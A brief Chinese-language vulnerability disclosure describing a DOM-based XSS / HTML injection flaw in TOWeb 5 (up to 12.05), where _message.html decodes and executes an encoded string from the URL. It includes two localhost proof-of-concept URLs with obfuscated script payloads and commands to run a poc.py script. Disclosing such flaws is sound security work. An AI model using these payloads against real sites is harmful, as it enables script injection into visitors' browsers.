参见 https://www.lauyan.com/en/toweb-updates.html#iyFEw37D
(基于 DOM 的 XSS)TOWeb 5 <= 12.05 版本中存在 HTML 注入漏洞,允许攻击者通过 _message.html 组件注入 HTML/JS 代码。
_message.html 文件用于显示错误页面,方式是对 ? 之后的密文进行解码并执行。127.0.0.1:8000/_message.html?==gP2lGZvwjP2lGZvwjPyJGP+InY84DcvwDZuV3bGBCdv5EIldWYQ5Dc84jMo9CPg4jMoxjPiEmchBXL3RnI9M3chx2YgYXakxjPxg2L8IXdlJncF5TMoxjPiIXZ05WZjpjbnlGbh1Cd4VGdi0TZslHdzBidpRGP)python3 poc.py; python3 -m http.server -d src -> 例如 http://127.0.0.1:8000/_message.html?==gC+QHcpJ3Yz9CPpcyUThFIkV2chJWLN9ERngCdyVGbh5DdwlmcjNHP